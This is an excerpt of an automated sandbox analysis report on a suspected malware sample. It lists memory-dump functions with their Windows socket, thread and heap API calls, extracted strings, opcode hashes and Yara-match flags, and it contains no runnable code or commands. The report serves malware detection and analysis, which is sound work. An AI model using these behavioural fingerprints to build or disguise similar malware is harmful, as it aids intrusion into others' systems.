                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID: Main
                                          • API String ID: 1452528299-521822810
                                          • Opcode ID: 8faab458f99f83600b06c5fc1a25670ed00276d492c9b580beb2d7b9aa3ccdfe
                                          • Instruction ID: 47f969ee2f2d5d668689d4d2999f388776f09b90f6a5baa82ce342a95f70ad2b
                                          • Opcode Fuzzy Hash: 8faab458f99f83600b06c5fc1a25670ed00276d492c9b580beb2d7b9aa3ccdfe
                                          • Instruction Fuzzy Hash: D841D372A40205EFEB20DF58D881BAAB3E8FF45B14F0446AAD845DB351E771E841CB91
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _free$DecrementInterlockedStringType___crt_memmove
                                          • String ID: zDl
                                          • API String ID: 2122248333-2720549762
                                          • Opcode ID: 3b5dbe45e515e00d00b3b980117ddf158f1375dabc186c7657ce0960d186aff1
                                          • Instruction ID: 5737610df4d969dfac9ab6b3aff46b1fdc7080246dfb96ecb7c1505436ada4ac
                                          • Opcode Fuzzy Hash: 3b5dbe45e515e00d00b3b980117ddf158f1375dabc186c7657ce0960d186aff1
                                          • Instruction Fuzzy Hash: 89514976A04215DFDB25CF24C880BE9B7B1FF4A308F1181EAE94DAB651D731AA90CF50
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 03D8B0CC
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 03D8B0EF
                                          • std::bad_exception::bad_exception.LIBCMT ref: 03D8B170
                                          • __CxxThrowException@8.LIBCMT ref: 03D8B17E
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 03D8B191
                                          • std::locale::facet::_Facet_Register.LIBCPMT ref: 03D8B1AB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                          • String ID: bad cast
                                          • API String ID: 2427920155-3145022300
                                          • Opcode ID: 9109fb48b8d772034d4b054416577b8518bfa1bcd9f3bfeb4ce1d3289c52f9ce
                                          • Instruction ID: 66715b3aa1194a92d8b898ddcac7352abd86615d452796bb17b33c72e04df21e
                                          • Opcode Fuzzy Hash: 9109fb48b8d772034d4b054416577b8518bfa1bcd9f3bfeb4ce1d3289c52f9ce
                                          • Instruction Fuzzy Hash: AF3182769102168FDB14FF54D851FAEB3B9FB04724F04025AE826AB281DB71BD08CBA1
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 03D8D3CC
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 03D8D3EF
                                          • std::bad_exception::bad_exception.LIBCMT ref: 03D8D46F
                                          • __CxxThrowException@8.LIBCMT ref: 03D8D47D
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 03D8D490
                                          • std::locale::facet::_Facet_Register.LIBCPMT ref: 03D8D4AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                          • String ID: bad cast
                                          • API String ID: 2427920155-3145022300
                                          • Opcode ID: 503ac4b5186d0beb303c8a9c45896d6194dd7c71d5a77f166e11e9790470c302
                                          • Instruction ID: 6ce05b6fee20b8dcbead5b76975a8d7be93a88be855d56d911a985ad3c40f334
                                          • Opcode Fuzzy Hash: 503ac4b5186d0beb303c8a9c45896d6194dd7c71d5a77f166e11e9790470c302
                                          • Instruction Fuzzy Hash: 2731A2769102168FDB14FFA8D850BADB3B9EB04724F44429AD816A73C1DB30BD44CBA1
                                          APIs
                                            • Part of subcall function 6C371AD3: SetTextColor.GDI32(00000000), ref: 6C371B19
                                          • _sprintf.LIBCMT ref: 6C372CC7
                                          • _sprintf.LIBCMT ref: 6C372CEA
                                            • Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF
                                          • _sprintf.LIBCMT ref: 6C372D20
                                            • Part of subcall function 6C3D1F84: __flsbuf.LIBCMT ref: 6C3D1FFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$ColorText__flsbuf__output_l
                                          • String ID: %s.$Aspects are different relationships between planets.$When planets are %s, one$another.
                                          • API String ID: 1481945667-3266434254
                                          • Opcode ID: 0023f396341c3312d6f1645062f708cffc8ffc2766cf20591c5fc29816669aab
                                          • Instruction ID: e934ed1bc20b8217da7bd221ea9302968a72c787d7537a76cfe6af1d3d4438c5
                                          • Opcode Fuzzy Hash: 0023f396341c3312d6f1645062f708cffc8ffc2766cf20591c5fc29816669aab
                                          • Instruction Fuzzy Hash: 302108B2900004D7CB21EB20CE45FECB3B9AF96308F41445184D0A7A44D779D98ACE67
                                          APIs
                                          • SetEvent.KERNEL32(?,?,00000000), ref: 03D84156
                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 03D84183
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 03D84199
                                          • TranslateMessage.USER32(?), ref: 03D841A4
                                          • DispatchMessageW.USER32(?), ref: 03D841AA
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 03D841B8
                                          • SetLastError.KERNEL32(000005B4), ref: 03D841E1
                                          • CloseHandle.KERNEL32(00000000), ref: 03D841F8
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$Peek$CloseDispatchErrorEventHandleLastMultipleObjectsTranslateWait
                                          • String ID:
                                          • API String ID: 1713936993-0
                                          • Opcode ID: b8d922bec13739eec4da162eb0491834f1c94b95933d13d3288274a82133395e
                                          • Instruction ID: 3e4a267dd6d5665619601ac6554d9d82e3f38ce5c259f01bcf4f348bd17d0f21
                                          • Opcode Fuzzy Hash: b8d922bec13739eec4da162eb0491834f1c94b95933d13d3288274a82133395e
                                          • Instruction Fuzzy Hash: 7621A776540305EBEB20EBA68C85FAA77B8EB48B10F140A19FA41E72C4D774F944CB70
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 03D83F35
                                          • SetLastError.KERNEL32(0000139F,?,74DEDFA0,03D83618), ref: 03D84023
                                            • Part of subcall function 03D82C10: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03D82C26
                                            • Part of subcall function 03D82C10: SwitchToThread.KERNEL32 ref: 03D82C3A
                                          • send.WS2_32(?,03DB5318,00000010,00000000), ref: 03D83F97
                                          • SetEvent.KERNEL32(?), ref: 03D83FBA
                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 03D83FC6
                                          • WSACloseEvent.WS2_32(?), ref: 03D83FD4
                                          • shutdown.WS2_32(?,00000001), ref: 03D83FEC
                                          • closesocket.WS2_32(?), ref: 03D83FF6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                          • String ID:
                                          • API String ID: 3254528666-0
                                          • Opcode ID: 64e00a46b34bbe9dafbcd9c1a7a2ac57d9d8951689c0143c2ec12f28f12054f7
                                          • Instruction ID: da9b385ac0ab045d841fed117294bb770274d485cdc9d98c140637371ab5c123
                                          • Opcode Fuzzy Hash: 64e00a46b34bbe9dafbcd9c1a7a2ac57d9d8951689c0143c2ec12f28f12054f7
                                          • Instruction Fuzzy Hash: 61215C7A200702EBD724EF69D888B96B7B5BF44B11F140918F115CB784D7B5F465CBA0
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 02F03F55
                                          • SetLastError.KERNEL32(0000139F,?,74DEDFA0,02F03638), ref: 02F04044
                                            • Part of subcall function 02F02B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02F02B96
                                            • Part of subcall function 02F02B80: SwitchToThread.KERNEL32 ref: 02F02BAA
                                          • send.WS2_32(?,02F17420,00000010,00000000), ref: 02F03FB6
                                          • SetEvent.KERNEL32(?), ref: 02F03FD9
                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02F03FE5
                                          • WSACloseEvent.WS2_32(?), ref: 02F03FF3
                                          • shutdown.WS2_32(?,00000001), ref: 02F0400B
                                          • closesocket.WS2_32(?), ref: 02F04015
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                          • String ID:
                                          • API String ID: 3254528666-0
                                          • Opcode ID: c196ce35d22241bc29093bc89ffc6dccee48f8c0a6003f667265f05111c0c652
                                          • Instruction ID: 0357803b3e0b437514495995b12fefd07e039d8da68354eab0d9a03ef81b4cdd
                                          • Opcode Fuzzy Hash: c196ce35d22241bc29093bc89ffc6dccee48f8c0a6003f667265f05111c0c652
                                          • Instruction Fuzzy Hash: 892168706407009BE3349F64D888B5BB7F9FB84B95F804D0DE292966C0C7B5E455DB90
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?,?,00000000,03D84008,?,?,74DEDFA0,03D83618), ref: 03D84044
                                          • ResetEvent.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84057
                                          • ResetEvent.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84060
                                          • ResetEvent.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84069
                                            • Part of subcall function 03D81360: HeapFree.KERNEL32(?,00000000,?,?,?,03D84076,?,?,74DEDFA0,03D83618), ref: 03D813A0
                                            • Part of subcall function 03D81430: HeapFree.KERNEL32(?,00000000,?,?,?,03D84081,?,?,74DEDFA0,03D83618), ref: 03D8144D
                                            • Part of subcall function 03D81430: _free.LIBCMT ref: 03D81469
                                          • HeapDestroy.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84089
                                          • HeapCreate.KERNEL32(?,?,?,?,?,74DEDFA0,03D83618), ref: 03D840A4
                                          • SetEvent.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84120
                                          • LeaveCriticalSection.KERNEL32(?,?,?,74DEDFA0,03D83618), ref: 03D84127
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                          • String ID:
                                          • API String ID: 1219087420-0
                                          • Opcode ID: ace0844cf2624537130b7620d9539256df1e40950c469e7486e547a9c8a9cb19
                                          • Instruction ID: b63f0b62315dfe8dc17ea3fc3304619327d18d18c1b27a8f579779ea81c8898b
                                          • Opcode Fuzzy Hash: ace0844cf2624537130b7620d9539256df1e40950c469e7486e547a9c8a9cb19
                                          • Instruction Fuzzy Hash: D5314976200A06EFD708EB39C858BA6F7A8FF48310F048659E569CB250DB35B915CFE0
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04064
                                          • ResetEvent.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04077
                                          • ResetEvent.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04080
                                          • ResetEvent.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04089
                                            • Part of subcall function 02F01350: HeapFree.KERNEL32(?,00000000,?,?,?,02F04096,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F01390
                                            • Part of subcall function 02F01420: HeapFree.KERNEL32(?,00000000,?,?,?,02F040A1,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F0143D
                                            • Part of subcall function 02F01420: _free.LIBCMT ref: 02F01459
                                          • HeapDestroy.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F040A9
                                          • HeapCreate.KERNEL32(?,?,?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F040C4
                                          • SetEvent.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04140
                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,02F04029,?,74DEDFA0,02F03638), ref: 02F04147
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                          • String ID:
                                          • API String ID: 1219087420-0
                                          • Opcode ID: 4c98dd88af2f3f18e0fec7dcd95f0bd054de55248d6305c1438ee590e4b4c540
                                          • Instruction ID: e9c848597f8f7d243f798a117bd0e0c705f12173cafdbcd729af0885dfe1073c
                                          • Opcode Fuzzy Hash: 4c98dd88af2f3f18e0fec7dcd95f0bd054de55248d6305c1438ee590e4b4c540
                                          • Instruction Fuzzy Hash: EC314671A00A06AFD705DB78CC88B96F7A9FF48350F408659E62987290CB35B865DFD0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3bf0000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memset$_malloc
                                          • String ID: ($6$gfff$gfff
                                          • API String ID: 3506388080-713438465
                                          • Opcode ID: bb8b999758f263b947e8caf31c84ff1df53292a2da770c4adba7dbdd92178812
                                          • Instruction ID: 9ca3d17a97a223f5bc2e8fea2459ac66332379c7d9c8541593e59b214c368451
                                          • Opcode Fuzzy Hash: bb8b999758f263b947e8caf31c84ff1df53292a2da770c4adba7dbdd92178812
                                          • Instruction Fuzzy Hash: 50D1AAB1E00318AFDB14EFE9EC84A9EBBB9FF48300F014129E505EB291D774A915CB91
                                          APIs
                                            • Part of subcall function 02F01610: __vswprintf.LIBCMT ref: 02F01646
                                          • _malloc.LIBCMT ref: 02F02330
                                            • Part of subcall function 02F06F93: __FF_MSGBANNER.LIBCMT ref: 02F06FAC
                                            • Part of subcall function 02F06F93: __NMSG_WRITE.LIBCMT ref: 02F06FB3
                                            • Part of subcall function 02F06F93: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F06FD8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: AllocateHeap__vswprintf_malloc
                                          • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                          • API String ID: 3723585974-868042568
                                          • Opcode ID: 57986cf73ae48de04804c7b3b56d5387a1ced4819c38fa379e6cb27cbe8ca76a
                                          • Instruction ID: 4fe56b1faf3609546be6d9817c0c67b61a061684d6e18c435db06b26af75b4c9
                                          • Opcode Fuzzy Hash: 57986cf73ae48de04804c7b3b56d5387a1ced4819c38fa379e6cb27cbe8ca76a
                                          • Instruction Fuzzy Hash: E7B1C575E002058FDF18CF68D9C46AA77A6BF48394F0845AEEE099B386D731D941DFA0
                                          APIs
                                          • _free.LIBCMT ref: 03D81888
                                          • _free.LIBCMT ref: 03D818C6
                                          • _free.LIBCMT ref: 03D81905
                                          • _free.LIBCMT ref: 03D81945
                                          • _free.LIBCMT ref: 03D8196D
                                          • _free.LIBCMT ref: 03D81991
                                          • _free.LIBCMT ref: 03D819C9
                                            • Part of subcall function 03D9AB04: RtlFreeHeap.NTDLL(00000000,00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB1A
                                            • Part of subcall function 03D9AB04: GetLastError.KERNEL32(00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000), ref: 03D9AB2C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 28e569f733c864184a1c9ae4c6f7698520a63bd561cc2920972b998a783792aa
                                          • Instruction ID: 71423acc53cd51cc4fdf54615d2afc7cf125375ff3e69936a950b91d639ec7cd
                                          • Opcode Fuzzy Hash: 28e569f733c864184a1c9ae4c6f7698520a63bd561cc2920972b998a783792aa
                                          • Instruction Fuzzy Hash: 32513DB6A10215DFC714FF58C480969BBB6FF88218B1A80AEC51A5F311C732BD4BCB91
                                          APIs
                                          • _free.LIBCMT ref: 02F01878
                                          • _free.LIBCMT ref: 02F018B6
                                          • _free.LIBCMT ref: 02F018F5
                                          • _free.LIBCMT ref: 02F01935
                                          • _free.LIBCMT ref: 02F0195D
                                          • _free.LIBCMT ref: 02F01981
                                          • _free.LIBCMT ref: 02F019B9
                                            • Part of subcall function 02F06F59: RtlFreeHeap.NTDLL(00000000,00000000,?,02F099CF,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F06F6F
                                            • Part of subcall function 02F06F59: GetLastError.KERNEL32(00000000,?,02F099CF,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000), ref: 02F06F81
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: b35a8292ee0bcd415e47a57dbbd02479a6c3d77d3933a9ad768a64f961dd7da2
                                          • Instruction ID: 28a3d44331cdbad2542c12debb167983aceea9e4b945e40b80798b88ad8afa65
                                          • Opcode Fuzzy Hash: b35a8292ee0bcd415e47a57dbbd02479a6c3d77d3933a9ad768a64f961dd7da2
                                          • Instruction Fuzzy Hash: 24516D72E00115CFD714DF58C4D0956BBE6BF8939872A80ADC60E9B351C732AD12DF91
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 03D83853
                                          • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 03D83894
                                          • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03D83901
                                          • GetCurrentThreadId.KERNEL32 ref: 03D8392C
                                          • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 03D839C4
                                          • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03D839F2
                                          • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03D83A09
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                          • String ID:
                                          • API String ID: 3058130114-0
                                          • Opcode ID: f0221bdaf25d10c8660ccd6b98ff6a2aca566ede117902669740cc40f41d7cbe
                                          • Instruction ID: 523d93129f33ef756a9c381caec84c2e7cc563aafe6c92e0d2f55316d08ec825
                                          • Opcode Fuzzy Hash: f0221bdaf25d10c8660ccd6b98ff6a2aca566ede117902669740cc40f41d7cbe
                                          • Instruction Fuzzy Hash: BF517CBDA00701DBD724FF68C984BAAB7A8EF44B14F144919E99ADB280EB70F541CB51
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 02F03873
                                          • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 02F038B4
                                          • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02F03921
                                          • GetCurrentThreadId.KERNEL32 ref: 02F0394C
                                          • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 02F039E4
                                          • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02F03A12
                                          • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02F03A29
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                          • String ID:
                                          • API String ID: 3058130114-0
                                          • Opcode ID: f39586be08a3bb85d3bd4116a31f335cfd26fcd7cefb7c2935fd1c8b128ba1bd
                                          • Instruction ID: f3fd1f7acbf89d557dc7def988d009b87c2b6a5150c5489485d9523fc9e27b0e
                                          • Opcode Fuzzy Hash: f39586be08a3bb85d3bd4116a31f335cfd26fcd7cefb7c2935fd1c8b128ba1bd
                                          • Instruction Fuzzy Hash: 6C518970E007059BDB209F64CDD4BAAB7E6BB44794F50485AEA9ADB2C0DB30F840DB51
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D936B9
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
                                            • Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2
                                          • _memmove.LIBCMT ref: 03D93712
                                          • _memmove.LIBCMT ref: 03D9371F
                                          • _memmove.LIBCMT ref: 03D93731
                                          • _memmove.LIBCMT ref: 03D93772
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                          • String ID: vector<T> too long
                                          • API String ID: 4034224661-3788999226
                                          • Opcode ID: 34ef468bcf97d56ae04d17728a57798c68f0f7237951f085a20b859cb0cd334a
                                          • Instruction ID: 280ea17f27a9e58b508a3079a06c01471a7d8221f8a2feb4c9066730d00c0017
